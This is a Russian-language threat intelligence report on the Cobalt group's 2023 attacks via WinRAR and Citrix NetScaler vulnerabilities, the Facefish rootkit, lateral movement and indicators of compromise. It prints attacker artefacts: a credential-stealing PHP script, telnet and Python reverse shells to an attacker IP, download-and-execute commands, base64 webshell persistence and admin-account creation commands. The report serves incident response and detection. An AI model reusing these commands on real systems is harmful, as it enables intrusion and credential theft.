Содержание
Введение
Деятельность киберпреступной группы Cobalt отслеживается с 2016 года и направлена на атаки кредитно-финансовых организаций для кражи средств. Однако в последние несколько лет группа сместила акцент атак с банков и теперь больше похожа на группу, которая занимается кибершпионажем. Несмотря на отсутствие громких кампаний с 2020 года, нами в последние несколько лет регулярно фиксируются фишинговые рассылки вредоносных файлов, вложенных в архив, запуск которых приводит к загрузке модуля CobInt. Это ВПО является одним из основных инструментов группы, и ранее не фиксировалось использование этого инструмента другими группами.
Кроме фишинговых рассылок, вредоносные файлы использовались в ходе атак на российские компании в сферах энергетики, образования и телекоммуникаций, что было зафиксировано во время реагирования на инциденты информационной безопасности в 2023 году. Обнаруженные факты позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны.
В статье будут рассмотрены две цепочки атак с использованием актуальных уязвимостей CVE-2023-38831 и CVE-2023-3519, а также руткит Facefish, используемый для компрометации узлов под управлением ОС Linux.
Вектор № 1. Запрос от (Ex)Cobalt
В конце августа 2023 года специалистами экспертного центра безопасности Positive Technologies (PT Expert Security Center, PT ESC) был замечен тренд на использование уязвимости CVE-2023-38831 в программном обеспечении WinRAR.
Из общего потока наблюдаемых файлов нас заинтересовал архив ucx_2314_4_2_ot_28_08_2023.rar, содержащий файл-приманку в формате PDF и вредоносный исполняемый файл.
В файле-приманке описана продукция китайской корпорации авиационной промышленности, текст написан на русском языке, что позволяет считать последующую цепочку действий целенаправленной атакой.
Так как архив имеет измененную файловую структуру, при открытии PDF файла происходит запуск исполняемого PE-файла Zapros_2314_4_2_ot_28_08_2023.pdf .cmd, который представляет собой установщик на платформе Nullsoft Scriptable Install System (NSIS) и инициирует следующий этап атаки.
Кроме описанного выше сценария первичного доступа с использованием уязвимости был обнаружен архив Zapros_13-2-16442-upr_ot_25_08_2023.zip c файловым ярлыком, который извлекает из себя и запускает аналогичный исполняемый файл. Команда LNK-файла:
/v /c set g="%cd%\Zapros_13-2-16442-upr_ot_25_08_2023.lnk"&(if not exist "!g!" (for /f "tokens=*" %u in ('where /r "%localappdata%" Zapros_13-2-16442-upr_ot_25_08_2023.l?k') do set g=%u))&>nul set n=t&set f=e&set o=%temp%&certu!n!il -decode "!g!" !o!\fahsdiksfaem.!f!xe&start /b !o!\fahsdiksfaem
Интересным является факт, что в именах файлов-приманок используется одинаковая маска Zapros*.
Дроппер NSIS
NSIS-скрипт, выполняющий процесс установки, извлекает во временную папку следующие файлы:
- файл-приманку (аналогичный PDF-файлу в архиве);
- открытый PowerShell-скрипт декодирования;
- шифрованный PowerShell-скрипт декодирования;
- набор закодированных файлов (их предназначение описано далее).
Кроме того, этот скрипт вызывает команды плагина — динамически подключаемой библиотеки nnujshaigu.dll (imphash:9ffedcca1b5171b3fb3e4430638971c1).
Первым делом жертве демонстрируется ожидаемый PDF-файл (см. рис. 3). Следующей командой исполняется PowerShell-скрипт yplseoefri.txt декодирования кода из файла auspun.txt, который отвечает за получение ключа от управляющего сервера hxxps://wop[.]fsbkal[.]com/xseyyzpyy.txt и расшифровку второго скрипта декодирования алгоритмом AES в режиме CBC. Для образца, извлеченного из LNK-файла, ключ загружается с соседнего домена hxxps://zay[.]fsbkal[.]com/isicpjgki.txt.
На момент исследования файлы-ключи для загрузки с управляющих серверов не были доступны, поэтому «штатная» работа ВПО завершалась, так как следующие команды предполагают расшифровку файла gmzaofeioe.dat для декодирования им оставшихся файлов.
Зашифрованный файл имеет сопоставимый размер (26 Кб) с PowerShell-скриптом декодирования на первом этапе, а оставшиеся файлы ampifkinn.txt, tygnfg.txt, yapaaiu.txt имеют схожий внешний вид отформатированного псевдослучайного текста, что позволило предположить, что на обоих этапах используется одинаковый алгоритм, но разный словарь кодировки.
Алгоритм декодирования подразумевает следующие шаги:
- исключение всех небуквенных символов;
- приведение всех символов к нижнему регистру;
- разбиение получившегося массива на пары — строки длиной 2 байта;
- замена каждой пары одним символом ASCII.
Стоит отметить, что каждый ASCII-символ имеет строго три варианта сопоставления (например, символ «a» может быть получен из пар «se», «he», «am»). Таким образом, зная основные лексемы языка PowerShell, а также частоты встречаемости символов в этом языке, удалось восстановить словарь и декодировать оставшиеся три файла.
Следующим этапом происходит декодирование файла полезной нагрузки и VBS-скрипта запуска полезной нагрузки, а также закрепление в системе при помощи записи в ветку реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Run ключа letsintellsvc, маскируясь под легитимное ПО.
VBS-скрипт деобфусцирует строку запуска файла основной нагрузки:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "LetsIntell.ps1"
Файл полезной нагрузки
Полезная нагрузка представлена PowerShell-скриптом, который хранит в себе два шелл-кода под архитектуры x86 и x64, подготавливает память и передает на них управление по заданному смещению. Скрипты имеют характерную обфускацию строк и большое число функций, выполняющих конкатенацию строк. Скрипт детектируется рядом антивирусных средств с вердиктом PwShell.Carbanak.
Шелл-код отвечает за загрузку основного компонента CobInt с контрольного сервера с адресом hxxps://logilokforce[.]com/vooijfmoyehiaoii. Адрес контрольного сервера и URL-адрес зашифрованы алгоритмом XOR c 4-байтовым ключом.
На момент анализа файлов основная нагрузка с этого контрольного сервера была недоступна. Подобные скрипты с встроенным шелл-кодом мы наблюдали в течение продолжительного времени и ранее. В следующей таблице перечислены контрольные суммы аналогичных файлов и извлеченные из них адреса для скачивания основной нагрузки. Выделены URL-адреса, с которых удалось загрузить файл следующего этапа.
sha256 | С2 |
---|---|
9f575176df27a12499cd7ce5771a3b23cb52bbaa014914085fc67f6a17860280 | https://onepostlive[.]com/anccdfhopcykoolqeyi |
a165a69186b8a2b885dceb77256d11a21007538d47b72526ed72721bd857df00 | https://knlrgb[.]com/edeuluuubyouxq |
671d7358c2b0d2b1f2697c05b6f17ae40762462ad960ab53613503e8a2f48e78 | https://avptp[.]com/teokqacxdsosauxpj |
67a3d5872bf1ee18d7c4d6739f91537c6bc41651747ad0e4ade71e65d619ef9d | https://winkb0172[.]com/tnoieeaiivowvbossidz |
92b640dbb0c12c06d9073e1aa42648531dbb25a867243c378e1ff7a3c8c74c87 | https://deadork[.]com/ytfyjuianoyveueuyasnzea |
4b3c9372d1038bc8882d30a4d3813154a0e772ed66fe64207a9003502a9ffd3a | https://winkb0172[.]com/izyhipdehabzzyearkdeog |
a47500325210892e0a00ba1250648e7c0d991daaad34eacbee88dc2ffe275202 | https://saakashvili.com[.]ua/vimtaolzobfldpoq |
59658F5B44E7BD2B19161CA8A82B6F8B25CFDD222CB65EB6E575EE12FCDC6464 | https://kavupdate[.]com/eaagzioiwa |
Все полученные файлы являются экземплярами основного модуля CobInt, логика работы которых соответствует описанию в статье компании Proofpoint и в материале Group-IB.
Вектор № 2. The Green Mile
Осенью 2023 года команду PT CSIRT привлекли к реагированию на инцидент информационной безопасности в российской компании в сфере энергетики. В ходе реагирования экспертами было установлено, что в организации был скомпрометирован шлюз удаленного доступа к сети Citrix NetScaler Gateway версии 13.1.
Первоначальный доступ
Предположительно, злоумышленникам удалось получить доступ при помощи публично известной уязвимости CVE-2023-3519, опубликованной в июле 2023 года. Подробный разбор уязвимости исследователями Assetnote:
- Analysis of CVE-2023-3519 in Citrix ADC and NetScaler Gateway;
- Analysis of CVE-2023-3519 in Citrix ADC and NetScaler Gateway (Part 2);
- Finding and Exploiting Citrix NetScaler Buffer Overflow (CVE-2023-3519) (Part 3).
На момент анализа шлюза веб-журналы были ротированы, поэтому подтвердить эксплуатацию уязвимости через связанные с ней GET-запросы не удалось. Тем не менее в неразмеченном пространстве файловой системы удалось обнаружить характерные запросы /gwtest/formssso?event=start&target=, которые указывают на попытки эксплуатации уязвимости CVE-2023-3519.
В процессе анализа был выявлен ряд веб-шеллов в директории /var/netscaler/logon/. Записи появились в файловой системе 17.08.2023 и соответствовали логике шелл-кода из опубликованного proof of concept от 01.08.2023.
При анализе сервера был выявлен простой веб-шелл с именем ctxHeaderLogon.php и ключом JohnCoffey2023!, позволяющий удаленно исполнять команды на шлюзе.
Кроме того, был обнаружен скрипт netscaler.php, который перехватывает входящие POST-запросы, а после записывает полученные из URL-адреса учетные записи в файл netscaler.1. Таким образом злоумышленникам удалось похитить десятки учетных записей.
<?php $date = date("d/m/y : H:i :"); $username= $_POST['u']; $password= $_POST['p']; #$password2= $_POST['p2']; if ($username !="undefined"){ $username = urldecode($username); $password = urldecode($password); file_put_contents("netscaler.1","Username:".$username.PHP_EOL ,FILE_APPEND); file_put_contents("netscaler.1","Password:".$password.PHP_EOL ,FILE_APPEND); file_put_contents('netscaler.1', "Date:".$date.$data.PHP_EOL, FILE_APPEND); #file_put_contents("netscaler.1", "PIN:".$password2.PHP_EOL ,FILE_APPEND); file_put_contents("netscaler.1","------------------".PHP_EOL ,FILE_APPEND); } ?>
Пример скомпрометированной учетной записи из файла netscaler.1.
Username: [REDACTED] Password:QWerty2024 Date:11/09/23 : 05:59 : -----------------------------------------------------
Про аналогичную связку веб-шелла, скрипта перехвата учетных записей и эксплуатацию уязвимости CVE-2023-3519 писали исследователи из компании Huntress в материале от 26.09.2023. Других пересечений с атакой, описанной в отчете, и расследуемым инцидентом мы не обнаружили.
Для управления узлом атакующие за достаточно короткий промежуток времени пробовали использовать разные способы, в том числе telnet (reverse shell) и reverse_shell.py.
sh -c '(sleep 4325|telnet 51.15.18.85 4102|while : ; do sh && break; done 2>&1|telnet 51.15.18.85 4102 >/dev/null 2>&1 &)'
Запуск reverse_shell.py:
Sep 25 13:53:22 [REDACTED] sh_command="python3 rev4204.py " Sep 25 13:53:43 [REDACTED] sh_command="netstat -an | grep 51.15.18.85 "
Содержимое файла reverse_shell.py:
exec(__import__('zlib').decompress(__import__('base64').b64decode (__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/IrckmA3t0i7LYgURDyIiuN4WkTaZ1dI0CUlWq+J/tyGLlxnemzdvPobJWR9xsHKEyL/ 10PO+C7CpeYj+JCOPwwToaD2e8WCw78wb0KpkO1RE/7XEIrS5WeRE1/ yM948396/756fb6weWdEJaY0BGSklTiaoR1VZsG8LrdVmzpOg9dCMqYJbgYrJOs0XQAI42DOk2ryROxnVypOTqjvAgPMgPuhgcyhek2jPWDH2+ DxqwBkMVu9SLnbr4r64yzRDMIGm6WiiQdnIeQqD5AaLf1IlUkJT8hwSyC78M/QGFbV7K')[0]))) | import socket,zlib,base64,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('51.15.18.85',4204)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d) |
Кроме того, злоумышленники запускали утилиту для туннелирования трафика Revsocks (Reverse socks5).
curl -O https://github.com/kost/revsocks/releases/download/v2.2/revsocks_freebsd_amd64 mv revsocks_freebsd_amd64 nsnetsvcs /netscaler/nsnetsvcs -connect 51.15.18.85:8844 -pass 123
ВПО Facefish
Кроме установленных веб-шеллов и программ туннелирования трафика атакующие предприняли попытку загрузки с управляющего сервера eu–debian[.]com и запуска дроппера Facefish с именем ssh3600. Об этом рутките ранее сообщали исследователи из компаний Juniper и Qihoo 360 Netlab.
Sep 25 13:47:15 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 ; ./ssh3600 ; rm -f ssh3600 " Sep 25 13:47:38 [REDACTED] sh_command="curl -O http://eu-debian.com/ssh3600 ; chmod +x ssh3600 "
Образец является разделяемой библиотекой (shared object), которая работает в пользовательском режиме и внедряется в процесс SSHD через метод LD_PRELOAD. Его основное назначение — кража учетных данных SSH, а также удаленное управление зараженным узлом.
Специалисты PT ESC неоднократно обнаруживали руткит Facefish в ходе расследований инцидентов ИБ. Помимо описанных ранее версий, нам удалось обнаружить новую модификацию:
- В новой версии добавлен перехват функции getdelim, который, подменяя легитимный системный вызов с аналогичным именем, при чтении конфигурационного файла /etc/ssh/sshd_config добавляет в итоговый результат дополнительный порт, на котором сервис SSH принимает входящие подключения.
- Транспорт реализуется по протоколу HTTPS с использованием библиотеки BearSSL.
- В новой модификации перехватываются следующие SSH-функции:
- user_key_allowed2;
- sshpam_auth_passwd;
- auth_shadow_pwexpired;
- getpwnamallow;
- login_write (новая функция);
- read_passphrase;
- ssh_userauth2;
- key_perm_ok;
- load_identity_file;
- key_load_private_type (новая функция).
На рисунке ниже представлена временная схема обнаружения образцов ВПО Facefish, которые использовали в атаках на российские компании.
Далее был обнаружен метод закрепления через RC-скрипт на устройстве Citrix NetScaler Gateway, позволяющий выполнять вредоносную нагрузку при каждом перезапуске системы. Метод является легальным и описан в документации к шлюзу. Модифицированный злоумышленниками файл rc.netscaler представлен ниже.
cp /nsconfig/gettytab /etc /bin/sh /etc/ntpd_ctl full_start nsapimgr -ys skip_systemaccess_policyeval=0 nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0 echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out /netscaler/ns_gui/vpn/images/vpn_ns_gui.php echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ0pvaG5Db2ZmZXkyMDIzISddKSk7Pz4= | /usr/bin/openssl base64 -d -out /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php chmod 6555 /bin/sh chmod 6555 /bin/sh
Скрипт записывает содержимое веб-шеллов в файлы vpn_ns_gui.php и css.php, а также устанавливает бит SUID. Ранее этот метод закрепления описали исследователи из Eclypsium.
Продвижение по сети
После успешного закрепления на устройстве Citrix NetScaler Gateway и компрометации привилегированных учетных записей атакующим удалось добраться до сетевого сегмента с Windows хостами.
Для компрометации дополнительных учетных записей злоумышленники провели дамп процесса LSASS с помощью публично доступной утилиты NanoDump.
Для перемещения внутри периметра атакующие использовали фреймворк Impacket. Пример создания учетной записи и добавления ее в группу «Локальные администраторы» представлен ниже.
%COMSPEC% /Q /c echo net user SUPPORT_[REDACTED] [REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\fRRzcYNi.bat & %COMSPEC% /Q /c %SYSTEMROOT%\fRRzcYNi.bat & del %SYSTEMROOT%\fRRzcYNi.bat %COMSPEC% /Q /c echo net localgroup administrators SUPPORT_[REDACTED] /add ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\KhVMDxzc.bat & %COMSPEC% /Q /c %SYSTEMROOT%\KhVMDxzc.bat & del %SYSTEMROOT%\KhVMDxzc.bat
После добавления учетной записи в группу «Локальные администраторы» злоумышленники многократно пытались запустить обфусцированный PowerShell-скрипт с именем kavupdate.ps1, анализ которого показал, что он является скриптом PwShell.Carbanak. При успешном запуске PwShell.Carbanak скачивает бэкдор CobInt с управляющего сервера kavupdate[.]com и выполняет его в оперативной памяти.
Стоит обратить внимание, что злоумышленники пытаются маскировать свой инструментарий и сетевую инфраструктуру под инфраструктуру «Лаборатории Касперского».
%COMSPEC% /Q /c echo powershell.exe -ep bypass -w hidden -c iex ((New-Object Net.WebClient).DownloadString('http://ukr-net.website/kavupdate.ps1')) ^\u003e \\\\%COMPUTERNAME%\\C$\\__output 2^\u003e^\u00261 \u003e %SYSTEMROOT%\\VvMnbfaA.bat \u0026 %COMSPEC% /Q /c %SYSTEMROOT%\\VvMnbfaA.bat \u0026 del %SYSTEMROOT%\\VvMnbfaA.bat
PowerShell-скрипт и загрузка основного модуля CobInt совпадают с рассмотренной ранее цепочкой, что позволяет нам объединить атаки. Подобные скрипты регулярно фиксируются специалистами на протяжении нескольких лет. На рисунке 15 представлены имена файлов и связанные с ними контрольные серверы по времени их обнаружения.
Сетевая инфраструктура
Анализ WHOIS-записей контрольных серверов демонстрирует, что большинство фигурирующих в кампании доменов зарегистрированы в Киеве.
Домен C2 | IP-адрес | Информация из WHOIS-записи |
---|---|---|
fsbkal.com | 172.67.205.75 | Registrant country: Ukraine |
knlrgb.com | 23.132.185.120 | Registrant country: Ukraine |
avptp.com | 185.117.73.169 | Registrant country: Ukraine |
deadork.com | 176.105.252.116 | Registrant country: Ukraine |
saakashvili.com.ua | 185.104.45.61 | organization: Hosting Ukraine LLC registrar: ua.ukraine |
ukr-net.website | - | Registrant country: Ukraine |
Кроме вышеперечисленных записей есть и другие управляющие серверы (смотри раздел «Сетевые индикаторы»), но единого критерия, позволяющего объединить все в одну группу и использовать для атрибуции, выделить не удалось.
Выводы
Рассмотренные в статье цепочки атак, а также вредоносные файлы, выявленные в ходе расследований в 2023 году в организациях сектора энергетики, образования и телекоммуникаций, позволяют сделать вывод, что группа Cobalt или некоторые из ее участников до сих пор активны. Общее число проведенных расследований и обнаруженных файлов предполагает не менее десяти потенциальных жертв на территории России. В арсенале группы появился новый инструмент — руткит Facefish, который атакующие используют для заражения узлов под управлением ОС Linux. Для компрометации компаний группа продолжает использовать актуальные уязвимости CVE-2023-38831 и CVE-2023-3519. На момент исследований в российском интернете было обнаружено более 50 шлюзов Citrix NetScaler Gateway с версиями, подверженными уязвимости.
Авторы: Александр Григорян, Максим Похлебин
Positive Technologies Expert Security Center (PT ESC)
MITRE TTPs
ID | Имя | Описание |
---|---|---|
Initial Access |
||
T1566.001 | Phishing: Spearphishing Attachment | Группа рассылала фишинговые письма с вредоносными вложениями |
T1190 | Exploit Public-Facing Application | Злоумышленники использовали общедоступный эксплойт (CVE-2023-3519) для получения доступа к инфраструктуре |
Execution |
||
T1203 | Exploitation for Client Execution | Группа использовала уязвимость в ПО WinRar для запуска вредоносных компонентов |
T1204.002 | User Execution: Malicious File | Группа рассылала письма с вредоносными архивами, содержащими LNK-файлы |
T1059.001 | Command and Scripting Interpreter: PowerShell | Группа применяла PowerShell-скрипты для загрузки и запуска своих компонентов |
T1059.005 | Command and Scripting Interpreter: Visual Basic | Группа применяла скрипты Visual Basic для запуска своих компонентов |
Persistence |
||
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Группа использовала ключи реестра (автозапуск) для закрепления в ОС |
T1037.004 | Boot or Logon Initialization Scripts: RC Scripts | Группа использовала метод закрепления через синхронизацию времени на устройстве Citrix NetScaler Gateway, позволяющий выполнять вредоносную нагрузку при каждом перезапуске системы. Он описан в документации к шлюзу. Для эксплуатации этого метода злоумышленники модифицировали файл rc.netscaler |
T1574.006 | Hijack Execution Flow: Dynamic Linker Hijacking | Facefish инжектируется через метод LD_PRELOAD в процесс SSHD |
Defense Evasion |
||
T1027.010 | Obfuscated Files or Information: Command Obfuscation | Группа использовала обфускацию строк и команд на всех этапах работы ВПО |
T1140 | Deobfuscate/Decode Files or Information | Группа использовала шифрование своих компонентов для их защиты от обнаружения и анализа |
Credential Access |
||
T1003.001 | OS Credential Dumping: LSASS Memory | Для компрометации дополнительных учетных записей злоумышленники выполнили дамп процесса LSASS публично доступной утилитой NanoDump |
T1056.003 | Input Capture: Web Portal Capture | Группа использовала скрипт netscaler.php, который перехватывает входящие POST-запросы, а после записывает полученные из URL учетные записи в файл netscaler.1 |
Lateral Movement |
||
TA0008 | Remote Services: SMB/Windows Admin Shares | Для перемещения внутри периметра атакующие использовали фреймворк Impacket |
Command and Control |
||
T1071.001 | Application Layer Protocol: Web Protocols | Группа использовала протокол HTTPS для взаимодействия с C2-сервером |
IoC
Файловые индикаторы
sha256 | sha1 | md5 |
---|---|---|
Файловые архивы |
||
ucx_2314_4_2_ot_28_08_2023.rar |
||
dc0b31112e40cf7a7e56e6efb30c0ddbfec25b04f91f040ea32b6a94da2f4ae1 | ce12638fab2d8eec7629859c591b5c96f2187bd6 | 3f4f213fe0a4d3de51400c5914865c2d |
Zapros_13-2-16442-upr_ot_25_08_2023.zip |
||
723a1240e7042c87e3ca749335d9d525da566eccc0113cd5fecb92e6cc2a4552 | 36f05bc39cac762fc2afd1e8444efb35f78dc97e | f84e409b4ca80e349a19fa7555177379 |
Запрос.rar |
||
7a00788861387277ac5d425d337081f04815b8e138fc907525298e4a753a5d12 | eb7a70ccfac55f1a84b2780781efa29659b2d0ba | ba1f2bfe95b219354ddad04b79579346 |
Вопросы.rar |
||
4734872c96538ac93dadb763c4a1b949451b4bb85499130344f296ede1363602 | 8c19486477e311033cde902256aca218fdb580b0 | 3cfc9972ad7cbd13cac51aade3f2b501 |
Doc.rar |
||
db12ab5d30afb28053390cdb363d7acadf78a05df0e758e6de9cbdfbbb2ec691 | 0b3d99d4a41a242887f2e8da6f5e6ddb05040a6b | c2ef9f814fc99670572ee76ba06d24da |
Doc.rar |
||
54f6476db646aa49076f9951d4b66573f16b005abe02cc19bc9f3b43ba7a2d63 | 6bbdc557d2c83dda50a9397a2326397d0b78f93c | 3751b3326f3963794d3835dbf65ac048 |
исх. 01-43-527 от 13.11.2020.rar |
||
f7e43e945f850d9e46e9ec8f1c12c92c25f5a58fb77289a5a773925acf33253c | c182f5d3870d2e2672e2852964652fd7264cff03 | 56be65fe4d9709c10cae511d53d92d1a |
Файловые ярлыки |
||
Zapros_13-2-16442-upr_ot_25_08_2023.lnk |
||
ec825d1321ad1d2f819c83301c5ff1970192d45b017a53177507f5e7716bceb8 | d90e2acca4af042fe8a76f428af6ca742224409d | 0da63b385b2b6650dd6acf3b511e5ac8 |
Предварительный список вопросов нашего интервью для согласования_jpg.lnk |
||
b9a9acfc4748a50ada048af2fa6bc9516da89e36e94e10f96effbcb167faa76d | a1088a23c4893d5c31fa92c11463904e63bc9bbe | bc740d642893e0fe23c75264ca7c2bca |
Исх.№1487 от 28.05.2021г Scan_Document_112247_jpg.lnk |
||
d7f56c043e7ca8592c71b691d27f74bd0e3ab95e302ecb8f70042b2dbf3d6938 | b90959a1f08fb2246ed31edbc9097fb4b9873c78 | d5628fe5de110e321110bbc76061702b |
Scan_Document_2021_1702679.lnk |
||
c4afe812d6b2354e27075e85efcd422dbdd0ea7a93a68fd562df41ce842a4f6a | d0c08ca2e85cc593e0070365d81f1590587c2210 | b25865010562a3863ef892311644b3bb |
Scan_Document_2021_1702679.lnk |
||
076861523bd5954677ea4ab97905c3c81695e3597dd14d2ebab3259faa354433 | 323343dafd5bad9b2efdd9f1b5e0540ca1d7b8ae | bdcb83cc6f54d571a2c102fbbd8083c7 |
Письмо исх. 01-43-527 от 13.11.2020.lnk |
||
432d39c43236a1fdf5275904d7d76affd8053c494fc230b28c63d8a23bdbe637 | adbcf3571ecd5a59cd7823a7dee0963790960b37 | 53ee0babcf03b17e02e4317b6a410b93 |
NSIS-установщики |
||
Zapros_2314_4_2_ot_28_08_2023.pdf .cmd |
||
44823ab8285aeba075afae39c95b520ded2f4a1c85bbe3aa1e30ff1901219524 | b6fa1fa8b47813ee67273a9873369c6b20e1570f | efef98a7f440599c3ce6771cd24eb823 |
fahsdiksfaem.exe |
||
bab354aa68a6f42746454d560c780cacc2a8c0de62da2c3ee3d13bec147e777a | 413a1b9c0042a5e54646c153ee0eaf44e2e35217 | 2762cdb6dc0f970e40fb3f67c391dde6 |
Windows_photo_viewers.exe |
||
023cb80b7ce8821726a80244f5ff4c22d9fd02245a99ad4a234c87befed6250b | 9fd37f603fea46ba14b8dd697d468cbf7c846eb3 | fc71981649d18468e416e327f6d2c523 |
3bdc05315efbfe59c6ce8a3a82495986677a4c7729f4cb6bb95335b4edb6cc2a | e0098470c988926128c59daa91a0c269ee040e67 | 78e6e317c689deecec2acb0fe04a2cd8 |
d0d736da2f65ac496ceeba4b5e672bda72ff57f0cd82da2a9792a852e72dee0a | ada5cd8277a778c8c014f189c8c271ed7b4afd97 | c77156623eeec2c7ac75e0eb3ff357cb |
PwShell.Carbanak |
||
ServMsctl.ps1 |
||
9f575176df27a12499cd7ce5771a3b23cb52bbaa014914085fc67f6a17860280 | ade7c84a8baf672c5fcf9e5afa5ad99cca38c8bf | 498c80bbf56f34bb0c0e235221c27d33 |
NotificationUx1s7c2a76.ps1 |
||
a165a69186b8a2b885dceb77256d11a21007538d47b72526ed72721bd857df00 | 9ee4203e7149879095e0600bc09570478b20a73b | 18ffdd86198bae2e64e1a8997803203f |
AC-Bot-x64.ps1 |
||
671d7358c2b0d2b1f2697c05b6f17ae40762462ad960ab53613503e8a2f48e78 | ca915b1de20306a91578ba38073d1657cb442697 | 6e78c9b597e2b12cc349c72d44a61a36 |
ProgramData-CanonGG-CanonGG.ps1 |
||
67a3d5872bf1ee18d7c4d6739f91537c6bc41651747ad0e4ade71e65d619ef9d | e967d45e8d57622dda7bd3b6c022e19170f37103 | 9fd7559fc4484e71436c0b00863a1941 |
IntellMcv.ps1 |
||
92b640dbb0c12c06d9073e1aa42648531dbb25a867243c378e1ff7a3c8c74c87 | 5c2e161ba31dee3bd339b3a86d128f6311876750 | dbe7a9f61c7bf17c05de72222dbff24c |
Load.ps1 |
||
4b3c9372d1038bc8882d30a4d3813154a0e772ed66fe64207a9003502a9ffd3a | 04452e5404ef0499b78368b73b8b6bcee71d9802 | 3c3557483f7374976148bddc39421d3b |
Intell.ps1 |
||
a47500325210892e0a00ba1250648e7c0d991daaad34eacbee88dc2ffe275202 | d1ca6b93fd9ee04a14dac2d5b6428ae29e419c1e | 370b1687f7a5d416a34cc5d86a8a551c |
DaTTxz_dgs2_ok.ps1 |
||
4dc7ad582d93d931d5ab04caa4b6884e3f1b1219c2ddced9452ce82104a3f846 | 0baf24abbede1f31dabd5c8efe307699fbcbcbe5 | 1430adfd7682e6aba17af48089d39a8b |
van.ps1 |
||
5a7790fb194984823acbc398496ab9ccda5815e1ed3c857c00b9ce7989414c3f | 8372663284df144bc1ea50502143a7cedfc43238 | 7cc9d3dd9bdbad7518f2b6ed84d72c3c |
BD95A8CD.ps1 |
||
11994c859fa3674634b1d79a5d20f3aeee0d06285287c2d3abc6339915bf8a3c | d8e2070449ddbb3a5f42f889599f101e5a757084 | abe4f09b23b961aa9a8a44da285c3f14 |
Drvstdc.ps1 |
||
bbc359c681f2e35ca6d22c8a391154168610927bb0af3c2e5c74117f96a9c174 | eee664e586e9e0085a3dda5718cdf650d0760132 | 3846c367d121e3256c97b9d1c0cbde8a |
Drvstd.ps1 |
||
c5b072170c03c63bb4b8c5bb2688fa27eccd3789947b0fa9d3b68fd829f24d2c | 384ec6b22141a45ec5a36fa7dc4f7e7cda43513a | 455527a3a2abcb9cdea1480fed0e34c8 |
Drvst.ps1 |
||
dae8f5dbf156f32cecf0f2570346784aa96d50cbe9f5c71e21b15ddb8e3795f6 | 234de71aca98969274287d3e37f81f346c831833 | 83ffd3cec3044fdaf3ef573a72fa6df8 |
AC-Bot-x64.ps1 |
||
86567d7de9c61880fb0f7fc5445c1f3e2d6c528522477acb445c7f57e5c0dd94 | f7f56e90b796fa0682fe20a28016a664e78a46ab | 370d4396691305e5d8bc592e237a07aa |
CanonIJEGS.ps1 |
||
9f781e520e5d8eb2f54ce6a5892ce49f2ba81e340962b0bef2fd13f87209a742 | 25cc79ecdc8686561283460b6d5ff85279677be6 | 41bda88a385e2ebac59dead51c5ed159 |
IntellDev.ps1 |
||
cfc47daaf190d5cea9c406f8c33fd2ef91fc4e17d7ebcd3a4501a5a7d95151f9 | 3dc0ee79bc679392a9269f5b44853c845917fd80 | 1d329686ce1a93e802f0f94d67a88bc9 |
Intelltec.ps1 |
||
6b60591bdc52884633684085726b23c0f689459041f9e35e97b958160a108e95 | 070438edc6047450beb5a54a518429c576de3459 | a5067dff82127ff87790e3538deb5505 |
75b1eb0405a2b18a5d4ceb1a68c2582e9e78beaf83b1819f555f1ec559ed994c | 626be2b17c72ef9649335f51dbe18eaa073675e6 | 5fed0e4d66f95175f2107a05f66a28a8 |
kavupdate.ps1 |
||
893f5a6edd7051c6d0f7531103827bfd3e462b794801967c6293f9c62dcda409 | 2ce0dd7142defd579e1d9e1926874eadab29e83e | 09481b8b10553b1d6c74ae5977342d81 |
Pack1632.ps1 |
||
0fbe88cd1f9cdebdd2e2dfec49fbd8d1f73f87cff366597b0868630e73e25f2b | 12de41e5004587cbc8fc8b8b2e2ef0226cfe05b9 | bdb5b304d9ad5afc9d1c08d018541df0 |
Pack1686Dv.ps1 |
||
83658aaeccd0fb3f027a8925abfb2c4f26e6881bc0c9ae774f6f35fe11b6804e | 6ea393d1246b7dab0e951d10d422e7cf9c4e7391 | b84d55ee1c8c82588897f6278712e3c4 |
IntellDev.vbs |
||
e3c861e03f6e3b0cfb77e3874828059a7376c8008a669f8730f7515477559f35 | 60510e37613d6e8e0d43382c48a8f73959f8229e | 5e6b61f78787a31ffcc4d6f93e0a0d01 |
IntellDev.txt |
||
796c112d6b1ccc5d1a686f509f4d808c4f072ae46f5ef68c5abf8f53c4ce24ed | c025d5680e9855540c87f3175353325ff1ef0ed3 | eed3f9b5f271c55c8918ab8c524b558a |
Pack1686Dv.vbs |
||
f4fe85729cd00484c5569801830fe38320f61ca551109b818935e3ac074ad371 | 306400c19b1cea992a4cc1fe11fd66cb5234ddf5 | b50223e111c604c9392cc6d98ff60abc |
ServMsctl.vbs |
||
a5a7f21d4e76fed18c662084d062005b6c66f3b726e3687eb1d56134093bd392 | 1506c17b44a4a17d173ff60ae5c263e2f17d2895 | 37c42a6c127d884e84fcf155fed35a1a |
ServMsctl.txt |
||
f6490e99fc157686a6328589735acd06c6a244ffb130c610c1b5d48c5a64c209 | 7300d55f76923a9318040f8bd6287efccc9d2023 | 6b57a835ec00d1805da5b912c720c0a3 |
Intelltec.exe |
||
d649055cc890b139e00eabe0b207df147fa2ec630c17fb2575047b2593b288f5 | 7772d7b4a94583559efdb0166f0ed08a758aed38 | 16695c4db4b4a658610f0849583b32ef |
CobInt MainModule |
||
cc8e3972bc0eee922303c6d8c031037f8ebaf39c710071b4760a033b0b90fce6 | ca705f5b62cda3522f4f8b802b9bee9c6561741f | 2372c6e4f2fd9800783d69061d419b4f |
